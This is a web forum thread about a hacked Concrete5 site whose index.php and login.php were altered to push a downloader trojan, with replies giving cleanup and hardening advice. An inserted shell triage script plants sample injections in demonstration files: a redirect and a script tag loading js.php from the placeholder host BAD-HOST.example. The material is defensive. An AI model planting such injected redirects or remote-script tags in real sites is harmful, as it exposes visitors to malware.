Concrete5 Web site hacked. Need help tracking down offending files

Hi,

A client has had their recently set up Concrete5 web site hacked.

There are at least 3 files involved.

They replaced the index.php and the login.php. There was code pointing it to a Russian website that tried to install a downloader trojan.

I still get a virus warning when I try to log in and if I use the wrong password, it triggers the virus warning.

Can someone tell me the name / location of the file that would respond to a bad password?

Also any advice on how to make the site more secure would be greatly appreciated.

Thank you.

Jerlo

triplei replied (Best Answer):
First off, sorry to hear about your situation. 99% of the time these types of hacks are due to a weak FTP password which was broken with a brute-force attack. First off, change your FTP password right away, otherwise their script may just re-upload their modified files.

I'm not sure how much control you have over your hosting environment, but there are a few things you can do. If it's an option, disable FTP. If you can get by with just using SFTP or SSH, you're already one step further ahead. Another option is to lock certain ports (21 and 22 would be common ones) to only specific IP addresses. If you are comfortable with only using SSH / SFTP, setting up public/private key authentication is a good way to go as well. If you do need to keep using FTP, changing the port it runs on from 21 to something non-default can help as well.

As for cleaning up, I would look at your main index.php file first. I have seen it where they just add in a little bit of extra code at the end to inject their content. Cleaning that out can often clear the entire site. If you can get a list of all files modified in the last couple of days and do a diff to your latest backup that should get you going in the right direction.

Hope that gets you going in the right direction at least...
ThemeGuru replied:
We're in the works of developing some dev tools to check out files to make sure you don't have something unauthorized.

What I would do is first ask your host if they can actually track down the script. I know for a fact that when one of our clients' websites was hacked, Bluehost found the file. It was buried deep within the core of c5.

Even if you lock your FTP you still have the chance of the virus coming back. An alternative idea would be removing the core completely and uploading it again from c5.org; that way you only need to dig through a small amount of files.

Hope that helps....
triplei replied:
Good thinking on re-uploading the /concrete folder, ThemeGuru. You're right, then you should only have to dig through your template and any custom blocks, packages, etc. you have developed yourself. And hopefully you have a clean copy of those on a dev/staging site that you can pull from.
ThemeGuru replied:
Yep. What we went through was that the hacker kept attacking the site due to their uploaded script.

Good thing you don't have a DoS attack. :-)
jerlo727 replied:
Thank you for your responses so far.

You're right the password was way too simple and has been changed.

After further investigation what I found were 2 index.php files that had been completely replaced with code linking you to a Russian website where it wanted to install a Downloader Trojan virus. There were also two login.php files that had code added to them that did the same thing.

I downloaded the entire site. With Dreamweaver you can search the code of the site for specific terms. When Avast blocked the connection, it gave me the web address that connected to a page called js.php.

So I did a search for js.php and found the files mentioned above. I replaced them with new ones and all works as it should.

Of course the danger is that Dreamweaver may have missed something but for now, things are working properly.

Since February, this is the third web site of mine to be hacked on two different servers. What a pain.

Thanks again.

jerlo
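An added example, not code from this thread or from Concrete5, that turns triplei's "list recently modified files and diff against your backup" advice and jerlo727's search for the js.php indicator into a repeatable triage script. The clean and live trees, the file contents and the BAD-HOST.example host are constructed for the demonstration.

```shell
#!/bin/sh
# Added example, not code from this thread or from Concrete5: triage a live web
# root against a known-clean copy (a backup or a fresh core download).
# All paths and file contents below are constructed for the demonstration.
set -u
export LC_ALL=C   # stable sort order for the output lists

# Strip the leading "DIR/" from absolute paths read on stdin. Usage: rel DIR
rel() { awk -v p="$1/" 'index($0, p) == 1 { print substr($0, length(p) + 1) }'; }

# Files modified within the last DAYS days (find -mtime counts whole days).
# Usage: recent_files LIVE_DIR DAYS  -> relative paths, one per line
recent_files() { find "$1" -type f -mtime -"$2" | rel "$1" | sort; }

# Files whose contents contain an indicator taken from the AV alert (js.php).
# Usage: indicator_hits LIVE_DIR STRING
indicator_hits() { grep -rlF -- "$2" "$1" | rel "$1" | sort; }

# Files that differ from the clean copy, or exist only in the live tree
# (a dropped script). Paths containing spaces are not handled.
# Usage: changed_files CLEAN_DIR LIVE_DIR
changed_files() {
  diff -rq "$1" "$2" | awk -v p="$2/" -v live="$2" '
    $1 == "Files" && index($4, p) == 1 { print substr($4, length(p) + 1) }
    $1 == "Only" {
      d = $3; sub(":$", "", d)
      if (d == live) print $4
      else if (index(d, p) == 1) print substr(d, length(p) + 1) "/" $4
    }' | sort
}
# Constructed sample: clean and live trees; live has a replaced index.php,
# an appended login.php and one extra file. Prints the directory it made.
build_sample() {
  w=$(mktemp -d)
  for t in clean live; do
    mkdir -p "$w/$t/concrete/tools" "$w/$t/config"
    printf '<?php require "concrete/dispatcher.php";\n' > "$w/$t/index.php"
    printf '<?php // login tool\n' > "$w/$t/concrete/tools/login.php"
    printf '<?php // site config\n' > "$w/$t/config/site.php"
    touch -t 202001010000 "$w/$t/config/site.php"   # backdate untouched file
  done
  # BAD-HOST.example is a placeholder for the host named in the AV alert.
  printf '<?php header("Location: http://BAD-HOST.example/js.php");\n' \
    > "$w/live/index.php"
  printf '<script src="http://BAD-HOST.example/js.php"></script>\n' \
    >> "$w/live/concrete/tools/login.php"
  printf '<?php // not in the clean copy\n' > "$w/live/concrete/x.php"
  echo "$w"
}
```

Run it as `W=$(build_sample); changed_files "$W/clean" "$W/live"; indicator_hits "$W/live" js.php; recent_files "$W/live" 2` against a real site, substituting the backup and web root paths; each file the three lists agree on is one to inspect or restore first.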
jasonmskidmore replied:
Since you mentioned that this is the third site of yours to be hacked, I thought I'd throw a suggestion your way.

I had a site hacked similarly a while back where they modified my index.php files. Since I made the changes below, I've not had any more problems:

- Use SFTP, not FTP
- Use secure SFTP passwords (mixed case, special characters, no dictionary words)
- Use different logins for each site
- Change those passwords every 1-3 months
- Ensure your computer is free of viruses & malware
- Make sure your server is not running any outdated (insecure) code